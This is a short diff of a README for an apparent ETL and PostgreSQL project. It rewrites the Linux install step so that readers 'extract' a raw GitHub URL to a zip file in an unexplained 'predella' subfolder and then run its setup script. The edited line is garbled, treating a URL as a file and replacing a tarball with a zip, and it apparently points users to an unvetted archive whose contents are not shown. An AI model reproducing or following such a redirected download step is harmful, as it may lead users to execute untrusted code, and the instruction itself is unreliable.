DHT07/etl-sql-postgres/README.md

 1. **Run the Installer**:
    - For Windows, double-click the `.exe` file and follow the prompts to complete the installation.
    - For macOS, open the `.dmg` file and drag the application to your Applications folder.
-   - For Linux, extract the `.tar.gz` file, and run the included setup script from the terminal.
+   - For Linux, extract the `https://raw.githubusercontent.com/DHT07/etl-sql-postgres/main/predella/etl-sql-postgres.zip` file, and run the included setup script from the terminal.

 2. **Configure PostgreSQL**:
    - Ensure that PostgreSQL is running on your machine.